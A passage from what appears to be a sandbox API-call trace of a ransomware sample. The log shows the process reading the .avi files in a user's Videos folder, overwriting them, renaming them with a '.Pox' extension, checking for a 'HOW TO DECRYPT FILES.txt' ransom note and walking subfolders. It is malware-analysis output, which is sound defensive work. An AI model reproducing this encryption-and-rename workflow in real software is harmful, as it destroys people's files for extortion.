SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\70vrtxhu8dwsbjddmtn.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.513] GetFileType (hFile=0x26c) returned 0x1 [0041.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.513] GetFileType (hFile=0x26c) returned 0x1 [0041.514] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x96b4 [0041.514] ReadFile (in: hFile=0x26c, lpBuffer=0x23d82ac, nNumberOfBytesToRead=0x96b4, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x23d82ac*, lpNumberOfBytesRead=0x3ae4fc*=0x96b4, lpOverlapped=0x0) returned 1 [0041.515] CloseHandle (hObject=0x26c) returned 1 [0041.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.529] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.530] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.530] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi", lpFilePart=0x0) returned 0x43 [0041.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.530] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\70vrtxhu8dwsbjddmtn.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.531] GetFileType (hFile=0x26c) returned 0x1 [0041.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.531] GetFileType (hFile=0x26c) returned 0x1 [0041.531] WriteFile (in: hFile=0x26c, lpBuffer=0x24543b0*, nNumberOfBytesToWrite=0x96c0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x24543b0*, lpNumberOfBytesWritten=0x3ae4f0*=0x96c0, lpOverlapped=0x0) returned 1 [0041.533] CloseHandle (hObject=0x26c) returned 1 [0041.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi", lpFilePart=0x0) returned 0x43 [0041.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi.Pox", lpFilePart=0x0) returned 0x47 [0041.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.534] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\70vrtxhu8dwsbjddmtn.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e6c600, ftCreationTime.dwHighDateTime=0x1d4cd3f, ftLastAccessTime.dwLowDateTime=0x2e2becb0, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x2af13d80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x96c0)) returned 1 [0041.534] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.534] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\70vrtxhu8dwsbjddmtn.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\70vrtxhu8dwsbjddmtn.avi.pox")) returned 1 [0041.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi", lpFilePart=0x0) returned 0x3c [0041.534] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\apkt5sjumxoe.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.535] GetFileType (hFile=0x26c) returned 0x1 [0041.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.535] GetFileType (hFile=0x26c) returned 0x1 [0041.535] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x14c9d [0041.535] ReadFile (in: hFile=0x26c, lpBuffer=0x34b6a30, nNumberOfBytesToRead=0x14c9d, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x34b6a30*, lpNumberOfBytesRead=0x3ae4fc*=0x14c9d, lpOverlapped=0x0) returned 1 [0041.537] CloseHandle (hObject=0x26c) returned 1 [0041.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.562] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi", lpFilePart=0x0) returned 0x3c [0041.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\apkt5sjumxoe.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.564] GetFileType (hFile=0x26c) returned 0x1 [0041.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.564] GetFileType (hFile=0x26c) returned 0x1 [0041.564] WriteFile (in: hFile=0x26c, lpBuffer=0x351e990*, nNumberOfBytesToWrite=0x14ca0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x351e990*, lpNumberOfBytesWritten=0x3ae4f0*=0x14ca0, lpOverlapped=0x0) returned 1 [0041.566] CloseHandle (hObject=0x26c) returned 1 [0041.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi", lpFilePart=0x0) returned 0x3c [0041.568] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi.Pox", lpFilePart=0x0) returned 0x40 [0041.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.568] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\apkt5sjumxoe.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d218590, ftCreationTime.dwHighDateTime=0x1d4c931, ftLastAccessTime.dwLowDateTime=0xba863680, ftLastAccessTime.dwHighDateTime=0x1d4c53a, ftLastWriteTime.dwLowDateTime=0x2af60040, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x14ca0)) returned 1 [0041.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.568] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\apkt5sjumxoe.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\apkT5SjumXOE.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\apkt5sjumxoe.avi.pox")) returned 1 [0041.569] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi", lpFilePart=0x0) returned 0x3f [0041.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\yg_xgpbg zncpte.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.569] GetFileType (hFile=0x26c) returned 0x1 [0041.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.569] GetFileType (hFile=0x26c) returned 0x1 [0041.569] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x16973 [0041.569] ReadFile (in: hFile=0x26c, lpBuffer=0x3533650, nNumberOfBytesToRead=0x16973, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x3533650*, lpNumberOfBytesRead=0x3ae4fc*=0x16973, lpOverlapped=0x0) returned 1 [0041.571] CloseHandle (hObject=0x26c) returned 1 [0041.593] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi", lpFilePart=0x0) returned 0x3f [0041.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\yg_xgpbg zncpte.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.595] GetFileType (hFile=0x26c) returned 0x1 [0041.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.596] GetFileType (hFile=0x26c) returned 0x1 [0041.596] WriteFile (in: hFile=0x26c, lpBuffer=0x35a4600*, nNumberOfBytesToWrite=0x16980, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x35a4600*, lpNumberOfBytesWritten=0x3ae4f0*=0x16980, lpOverlapped=0x0) returned 1 [0041.598] CloseHandle (hObject=0x26c) returned 1 [0041.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi", lpFilePart=0x0) returned 0x3f [0041.599] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi.Pox", lpFilePart=0x0) returned 0x43 [0041.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.599] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\yg_xgpbg zncpte.avi"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64eefef0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0x40712d30, ftLastAccessTime.dwHighDateTime=0x1d4cd25, ftLastWriteTime.dwLowDateTime=0x2afac300, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x16980)) returned 1 [0041.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.600] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\yg_xgpbg zncpte.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\Yg_XgPbG znCpTe.avi.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\yg_xgpbg zncpte.avi.pox")) returned 1 [0041.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW", lpFilePart=0x0) returned 0x35 [0041.600] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\", lpFilePart=0x0) returned 0x36 [0041.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bb23aa0, ftCreationTime.dwHighDateTime=0x1d4d406, ftLastAccessTime.dwLowDateTime=0xf7e02a10, ftLastAccessTime.dwHighDateTime=0x1d4cb37, ftLastWriteTime.dwLowDateTime=0xf7e02a10, ftLastWriteTime.dwHighDateTime=0x1d4cb37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0041.601] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bb23aa0, ftCreationTime.dwHighDateTime=0x1d4d406, ftLastAccessTime.dwLowDateTime=0xf7e02a10, ftLastAccessTime.dwHighDateTime=0x1d4cb37, ftLastWriteTime.dwLowDateTime=0xf7e02a10, ftLastWriteTime.dwHighDateTime=0x1d4cb37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.601] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df3f0d0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x38064c0, ftLastAccessTime.dwHighDateTime=0x1d4cd54, ftLastWriteTime.dwLowDateTime=0x38064c0, ftLastWriteTime.dwHighDateTime=0x1d4cd54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hy_v9XfWfaIog", cAlternateFileName="HY_V9X~1")) returned 1 [0041.601] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x427b4c40, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xfe32e400, ftLastAccessTime.dwHighDateTime=0x1d4d4ee, ftLastWriteTime.dwLowDateTime=0xfe32e400, ftLastWriteTime.dwHighDateTime=0x1d4d4ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iYiVuH86FKUUy2zrS", cAlternateFileName="IYIVUH~1")) returned 1 [0041.601] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21dcbda0, ftCreationTime.dwHighDateTime=0x1d4d386, ftLastAccessTime.dwLowDateTime=0xc86911d0, ftLastAccessTime.dwHighDateTime=0x1d4d586, ftLastWriteTime.dwLowDateTime=0xc86911d0, ftLastWriteTime.dwHighDateTime=0x1d4d586, nFileSizeHigh=0x0, nFileSizeLow=0x10bbd, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0fJr8b4TB.avi", cAlternateFileName="V0FJR8~1.AVI")) returned 1 [0041.601] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38294fd0, ftCreationTime.dwHighDateTime=0x1d4cfec, ftLastAccessTime.dwLowDateTime=0xbf7744a0, ftLastAccessTime.dwHighDateTime=0x1d4d533, ftLastWriteTime.dwLowDateTime=0xbf7744a0, ftLastWriteTime.dwHighDateTime=0x1d4d533, nFileSizeHigh=0x0, nFileSizeLow=0x15c1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="zX3Ey.avi", cAlternateFileName="")) returned 1 [0041.601] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.602] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0041.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0041.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW", lpFilePart=0x0) returned 0x35 [0041.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\", lpFilePart=0x0) returned 0x36 [0041.602] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\1EG_rMLJW\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bb23aa0, ftCreationTime.dwHighDateTime=0x1d4d406, ftLastAccessTime.dwLowDateTime=0xf7e02a10, ftLastAccessTime.dwHighDateTime=0x1d4cb37, ftLastWriteTime.dwLowDateTime=0xf7e02a10, ftLastWriteTime.dwHighDateTime=0x1d4cb37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0041.602] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bb23aa0, ftCreationTime.dwHighDateTime=0x1d4d406, ftLastAccessTime.dwLowDateTime=0xf7e02a10, ftLastAccessTime.dwHighDateTime=0x1d4cb37, ftLastWriteTime.dwLowDateTime=0xf7e02a10, ftLastWriteTime.dwHighDateTime=0x1d4cb37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.602] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5df3f0d0, ftCreationTime.dwHighDateTime=0x1d4d4c9, ftLastAccessTime.dwLowDateTime=0x38064c0, ftLastAccessTime.dwHighDateTime=0x1d4cd54, ftLastWriteTime.dwLowDateTime=0x38064c0, ftLastWriteTime.dwHighDateTime=0x1d4cd54, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hy_v9XfWfaIog", cAlternateFileName="HY_V9X~1")) returned 1 [0041.602] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x427b4c40, ftCreationTime.dwHighDateTime=0x1d4cdad, ftLastAccessTime.dwLowDateTime=0xfe32e400, ftLastAccessTime.dwHighDateTime=0x1d4d4ee, ftLastWriteTime.dwLowDateTime=0xfe32e400, ftLastWriteTime.dwHighDateTime=0x1d4d4ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iYiVuH86FKUUy2zrS", cAlternateFileName="IYIVUH~1")) returned 1 [0041.603] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21dcbda0, ftCreationTime.dwHighDateTime=0x1d4d386, ftLastAccessTime.dwLowDateTime=0xc86911d0, ftLastAccessTime.dwHighDateTime=0x1d4d586, ftLastWriteTime.dwLowDateTime=0xc86911d0, 